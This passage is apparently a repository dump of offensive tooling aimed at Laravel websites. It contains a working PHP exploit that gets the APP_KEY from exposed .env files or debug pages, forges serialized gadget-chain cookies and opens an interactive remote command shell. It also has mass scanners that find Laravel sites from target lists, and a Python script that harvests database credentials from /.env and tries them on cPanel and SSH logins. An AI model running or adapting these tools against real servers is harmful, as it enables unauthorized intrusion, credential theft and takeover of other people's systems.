'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' . "\x00" . '*' . "\x00" . 'listeners";a:1:{s:' . strlen($command) . ':"' . $command . '";a:1:{i:0;s:' . strlen($func) . ':"' . $func . '";}}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}'; 47 | break; 48 | case 3: 49 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' . "\x00" . '*' . "\x00" . 'app";s:' . strlen($command) . ':"' . $command . '";s:17:"' . "\x00" . '*' . "\x00" . 'defaultChannel";s:1:"x";s:17:"' . "\x00" . '*' . "\x00" . 'customCreators";a:1:{s:1:"x";s:' .strlen($func) . ':"' . $func . '";}}}'; 50 | break; 51 | case 4: 52 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:' . strlen($func) . ':"' . $func . '";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}'; 53 | break; 54 | case 5: 55 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"' . "\x00" . '*' . "\x00" . 'queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;s:4:"load";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{s:9:"' . "\x00" . '*' . "\x00" . 'config";O:35:"Mockery\Generator\MockConfiguration":1:{s:7:"' . "\x00" . '*' . "\x00" . 'name";s:7:"abcdefg";}s:7:"' . "\x00" . '*' . "\x00" . 'code";s:'. strlen($p) . ':"' . $p . '";}}}'; 56 | break; 57 | case 6: 58 | $payload = 'O:29:"Illuminate\Support\MessageBag":2:{s:11:"' . "\x00" . '*' . "\x00" . 'messages";a:0:{}s:9:"' . "\x00" . '*' . "\x00" . 'format";O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"' . "\x00" . '*' . "\x00" . 'queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;s:4:"load";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{s:9:"' . "\x00" . '*' . "\x00" . 'config";O:35:"Mockery\Generator\MockConfiguration":1:{s:7:"' . "\x00" . '*' . "\x00" . 'name";s:7:"abcdefg";}s:7:"' . "\x00" . '*' . "\x00" . 'code";s:' . strlen($p) . ':"' . $p . '";}}}}'; 59 | break; 60 | } 61 | return base64_encode($payload); 62 | } 63 | } 64 | 65 | class Requester 66 | { 67 | 68 | public function Requests($url, $postdata = null, $headers = null, $follow = true) 69 | { 70 | $ch = curl_init(); 71 | curl_setopt($ch, CURLOPT_URL, $url); 72 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 73 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 74 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 75 | curl_setopt($ch, CURLOPT_HEADER, 1); 76 | if (!empty($headers) && $headers != null) 77 | { 78 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 79 | } 80 | if (!empty($postdata) && $postdata != null) 81 | { 82 | curl_setopt($ch, CURLOPT_POST, 1); 83 | curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); 84 | } 85 | if ($follow) 86 | { 87 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 88 | } 89 | $data = curl_exec($ch); 90 | $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); 91 | $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); 92 | $head = substr($data, 0, $header_size); 93 | $body = substr($data, $header_size); 94 | return json_decode(json_encode(array( 95 | 'status_code' => $status_code, 96 | 'headers' => $this->HeadersToArray($head) , 97 | 'body' => $body 98 | ))); 99 | } 100 | public function HeadersToArray($str) 101 | { 102 | $str = explode("\r\n", $str); 103 | $str = array_splice($str, 0, count($str) - 1); 104 | $output = []; 105 | foreach ($str as $item) 106 | { 107 | if ($item === '' || empty($item)) continue; 108 | $index = stripos($item, ": "); 109 | $key = substr($item, 0, $index); 110 | $key = strtolower(str_replace('-', '_', $key)); 111 | $value = substr($item, $index + 2); 112 | if (@$output[$key]) 113 | { 114 | if (strtolower($key) === 'set_cookie') 115 | { 116 | $output[$key] = $output[$key] . "; " . $value; 117 | } 118 | else 119 | { 120 | $output[$key] = $output[$key]; 121 | } 122 | } 123 | else 124 | { 125 | $output[$key] = $value; 126 | } 127 | } 128 | return $output; 129 | } 130 | } 131 | 132 | class Exploit extends Requester 133 | { 134 | public $url; 135 | public $vuln; 136 | public $app_key; 137 | public function __construct($url) 138 | { 139 | $this->url = $url; 140 | $this->vuln = null; 141 | $this->app_key = null; 142 | } 143 | public function getAppKeyEnv() 144 | { 145 | $req = parent::Requests($this->url . "/.env", null, null, $follow = false); 146 | if (preg_match('/APP_KEY/', $req->body)) 147 | { 148 | preg_match_all('/APP_KEY=([a-zA-Z0-9:;\/\\=$%^&*()-+_!@#]+)/', $req->body, $matches, PREG_SET_ORDER, 0); 149 | $this->app_key = $matches[0][1]; 150 | } 151 | } 152 | public function getAppKey() 153 | { 154 | $req = parent::Requests($this->url, 'a=a', null, false); 155 | if (preg_match('/APP_KEY<\/td>/', $req->body)) 156 | { 157 | preg_match_all('/APP_KEY<\/td>\s+(.*?)<\/span>/', $req->body, $matches, PREG_SET_ORDER, 0); 158 | $this->app_key = $matches[0][1]; 159 | } 160 | else 161 | { 162 | $this->getAppKeyEnv($this->url); 163 | } 164 | } 165 | } 166 | function Help() { 167 | echo " 168 | url=URL // Target Required 169 | Optionals: 170 | key=APP_KEY // Setting app key if u have 171 | function=system // Function ex : system, passthru 172 | method=1 // method 1 - 4 Required function parameter, 5 - 6 ( Eval mode ) 173 | ". PHP_EOL; 174 | } 175 | parse_str(implode("&", array_slice($argv, 1)), $_GET); 176 | if (!$_GET['url']) return Help(); 177 | $urls = $_GET['url']; 178 | $Req = new Requester(); 179 | $wibu = new Exploit($urls); 180 | $Func = new Func_(); 181 | $function = 'system'; 182 | $method = 1; 183 | if ($_GET['key']) { 184 | $wibu->app_key = $_GET['key']; 185 | } else { 186 | $wibu->getAppKey(); 187 | } 188 | if ($_GET['function']) { 189 | $function = $_GET['function']; 190 | } 191 | if ($_GET['method']) { 192 | $method = $_GET['method']; 193 | } 194 | if ($wibu->app_key != null) 195 | { 196 | while (true) 197 | { 198 | $cmd = readline('Command ~> '); 199 | $app = str_replace('base64:', '', $wibu->app_key); 200 | $command = $Func->GeneratePayload($cmd, $function, $method); 201 | $serialize = $Func->Serialize($app, $command); 202 | $header = array( 203 | 'Cookie: XSRF-TOKEN=' . $serialize 204 | ); 205 | $bre = $Req->Requests($urls,null, $header, false); 206 | $res = explode('', $bre->body)[1]; 207 | echo ($res) ? $res . PHP_EOL : 'Empty Response' . PHP_EOL; 208 | } 209 | } 210 | else 211 | { 212 | echo $urls . " ===> Cannot get APP_KEY!" . PHP_EOL; 213 | } 214 | -------------------------------------------------------------------------------- /laravel-sitecheck.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Mass Laravel Site Checker 3 | # Created By Im-Hanzou 4 | # Using GNU Parallel 5 | # Usage: bash file.sh list.txt thread 6 | 7 | yellow='\033[0;33m' 8 | cat << "EOF" 9 | _ _ 10 | | | __ _ _ _ __ _ __ __ ___ | | 11 | | |__ / _` || '_|/ _` |\ V // -_)| | 12 | |____|\__,_||_| \__,_| \_/ \___||_| 13 | 14 | EOF 15 | printf "${yellow}Mass Laravel Site Checker\nGithub : im-hanzou\nUsage: bash file.sh list.txt thread\nExample: bash laravel-sitecheck.sh list.txt 50\n\n\n" 16 | 17 | exploit(){ 18 | classic='\033[0m' 19 | red='\e[41m' 20 | green='\e[42m' 21 | target=$1 22 | thread=$2 23 | 24 | if [[ $(curl --silent --connect-timeout 10 --max-time 10 --insecure -o /dev/null -c - $target ) =~ 'XSRF-TOKEN' || $(curl --silent --connect-timeout 10 --max-time 10 --insecure -o /dev/null -c - $target ) =~ '_session' ]]; 25 | then 26 | printf "${green}[ Valid ]${classic} => [ $target | Laravel Site ] \n"; 27 | printf "$target\n" >> laravel.txt 28 | else 29 | printf "${red}[ Not Valid ]${classic} => $target \n"; 30 | printf "$target\n" >> notlaravel.txt 31 | fi 32 | } 33 | 34 | export -f exploit 35 | parallel --no-notice -j $2 exploit :::: $1 36 | 37 | printf "\033[0;36mLaravel Site : laravel.txt\n"; 38 | printf "\033[0;36mNot Laravel Site : notlaravel.txt\n"; 39 | -------------------------------------------------------------------------------- /laravel-sitechecker.php: -------------------------------------------------------------------------------- 1 | TRUE)); 44 | // Sorry i forgot xD 45 | // if(preg_match_all("/_session/", $cookies)){ 46 | // $lines = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 47 | // if (!in_array($url, $lines)) { 48 | // file_put_contents($file, $url . PHP_EOL, FILE_APPEND | LOCK_EX); 49 | // } 50 | // return json_encode(array("laravel" => TRUE)); 51 | 52 | // }if(preg_match_all("/XSRF-TOKEN/", $cookies)){ 53 | // $lines = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 54 | // if (!in_array($url, $lines)) { 55 | // file_put_contents($file, $url . PHP_EOL, FILE_APPEND | LOCK_EX); 56 | // } 57 | // return json_encode(array("laravel" => TRUE)); 58 | 59 | }else{ 60 | if (!file_exists('invalid_laravel.txt')) { 61 | touch('invalid_laravel.txt'); 62 | } 63 | $lines = file('invalid_laravel.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 64 | if (!in_array($url, $lines)) { 65 | file_put_contents('invalid_laravel.txt', $url . PHP_EOL, FILE_APPEND | LOCK_EX); 66 | } 67 | return json_encode(array("laravel" => FALSE)); 68 | } 69 | } 70 | 71 | echo "Laravel Site Checker".PHP_EOL; 72 | echo "Created By : Speciment ID".PHP_EOL; 73 | echo "Fixed By : IM-Hanzou".PHP_EOL; 74 | echo PHP_EOL; 75 | echo "Input Sitelist : "; 76 | $list = file_get_contents(trim(fgets(STDIN))); 77 | echo "Valid Result Filename : "; 78 | $output = trim(fgets(STDIN)); 79 | if (!file_exists($output)) { 80 | touch($output); 81 | } 82 | $exp = explode(PHP_EOL, trim($list)); 83 | echo "Invalid Result Filename : invalid_laravel.txt".PHP_EOL; 84 | 85 | $i = 1; 86 | foreach($exp as $site){ 87 | echo $i.". ".$site." : ".checker($site, $output).PHP_EOL; 88 | $i++; 89 | } 90 | echo "\nResult saved in $output \n".PHP_EOL; 91 | -------------------------------------------------------------------------------- /laravel-sitechecker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # Mass Laravel Site Checker 3 | # Created By Im-Hanzou 4 | # Using threading for multi-worker 5 | # Usage: python laravel-sitechecker.py list.txt thread 6 | 7 | import sys 8 | import threading 9 | import requests 10 | import urllib3 11 | from colorama import Fore, Style 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | print(Fore.CYAN + r""" 15 | _ _ 16 | | | __ _ _ _ __ _ __ __ ___ | | 17 | | |__ / _` || '_|/ _` |\ V // -_)| | 18 | |____|\__,_||_| \__,_| \_/ \___||_| 19 | 20 | """) 21 | print(Fore.YELLOW + "Mass Laravel Site Checker\nGithub: im-hanzou\nUsage: python laravel-sitechecker.py list.txt thread\nExample: python laravel-sitecheck.py list.txt 50\n\n") 22 | Style.RESET_ALL 23 | def exploit(target): 24 | try: 25 | classic = Style.RESET_ALL 26 | result = requests.get(target, timeout=10, verify=False) 27 | if 'XSRF-TOKEN' in result.cookies or '_session' in result.cookies: 28 | print(Fore.GREEN + "[ Valid ]" + classic + " => [ " + target + " | Laravel Site ]") 29 | with open('laravel.txt', 'a') as f: 30 | f.write(target + '\n') 31 | else: 32 | print(Fore.RED + "[ Not Valid ]" + classic + " => " + target) 33 | with open('notlaravel.txt', 'a') as f: 34 | f.write(target + '\n') 35 | except requests.exceptions.Timeout: 36 | print(Fore.RED + "[ Timeout ]" + classic + " => " + target) 37 | except requests.exceptions.RequestException: 38 | print(Fore.RED + "[ Connection Error ]" + classic + " => " + target) 39 | except: 40 | pass 41 | 42 | if __name__ == "__main__": 43 | if len(sys.argv) != 3: 44 | print("Usage: python laravel-sitechecker.py list.txt thread") 45 | sys.exit(1) 46 | 47 | target_file = sys.argv[1] 48 | num_threads = int(sys.argv[2]) 49 | 50 | targets = [] 51 | with open(target_file, 'r') as f: 52 | targets = f.read().splitlines() 53 | 54 | threads = [] 55 | for target in targets: 56 | t = threading.Thread(target=exploit, args=(target,)) 57 | threads.append(t) 58 | t.start() 59 | 60 | for thread in threads: 61 | thread.join() 62 | 63 | laravel_file = 'laravel.txt' 64 | notlaravel_file = 'notlaravel.txt' 65 | 66 | with open(laravel_file, 'r') as f: 67 | laravel_lines = len(f.readlines()) 68 | 69 | with open(notlaravel_file, 'r') as f: 70 | notlaravel_lines = len(f.readlines()) 71 | 72 | print(Fore.CYAN + f"Laravel Site: {laravel_file} ({laravel_lines} lines)") 73 | print(Fore.CYAN + f"Not Laravel Site: {notlaravel_file} ({notlaravel_lines} lines)") 74 | -------------------------------------------------------------------------------- /laravel-smtp-ssh-cpanel-v2.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import paramiko 4 | import socket 5 | from requests.exceptions import * 6 | from colorama import init, Fore 7 | from concurrent.futures import ThreadPoolExecutor 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 9 | 10 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 11 | init(autoreset=True) 12 | 13 | class Laravel(object): 14 | def __init__(self, url): 15 | self.url = url.rstrip('/') 16 | self.body = None 17 | self.headers = None 18 | self.smtp = None 19 | self.ssh = None 20 | self.cpanel = None 21 | self.user = None 22 | self.paswd = None 23 | self.ip = None 24 | 25 | def checkEnv(self): 26 | try: 27 | req = requests.get(self.url + "/.env", verify=False) 28 | if req.status_code == 200 and "APP_ENV" in req.text: 29 | res = req.text.replace("\n", "##") 30 | bro = re.findall(r"DB_USERNAME=(.*?)##", res)[0] 31 | bros = re.findall(r"DB_PASSWORD=(.*?)##", res)[0] 32 | if "_" in bro: 33 | self.user = bro.split("_")[0] 34 | else: 35 | self.user = bro 36 | bross = self.url.split("/") 37 | self.ip = socket.gethostbyname(bross[2]) 38 | self.paswd = bros 39 | self.body = req.text 40 | self.headers = req.headers 41 | return True 42 | return False 43 | except (ConnectionError, Exception): 44 | return False 45 | 46 | def loginCpanel(self): 47 | url = self.url.split("/") 48 | datas = { 49 | "user": self.user, 50 | "pass": self.paswd, 51 | "goto": "/" 52 | } 53 | try: 54 | req = requests.post(url[0] + "//" + url[2] + ":2082/login/?login_only=1", data=datas, verify=False) 55 | if "redirect" in req.text and "security_token" in req.text: 56 | self.cpanel = self.url + "|" + self.user + "|" + self.paswd 57 | return True 58 | return False 59 | except Exception as e: 60 | return False 61 | 62 | def loginSSH(self): 63 | try: 64 | ssh = paramiko.SSHClient() 65 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 66 | ssh.connect(self.ip, port=22, username=self.user, password=self.paswd, timeout=10) 67 | self.ssh = self.ip + "|" + self.user + "|" + self.paswd 68 | return True 69 | except (paramiko.ssh_exception.AuthenticationException, Exception): 70 | return False 71 | 72 | def checkCpanel(self): 73 | try: 74 | req = requests.get(self.url + "/cpanel", verify=False) 75 | if req.status_code == 200 and " 3 | - ubuntu/debian
# sudo apt-get install parallel -y
- centos
# sudo yum install parallel -y

4 | Windows :
5 | You can install WSL (windows subsystem linux) then do install like linux

* If you want use windows without installing WSL, install GitBash 6 |
# curl pi.dk/3/ > install.sh
# sha1sum install.sh | grep 12345678
# md5sum install.sh
# sha512sum install.sh
# bash install.sh
7 | --------------------------------------------------------------------------------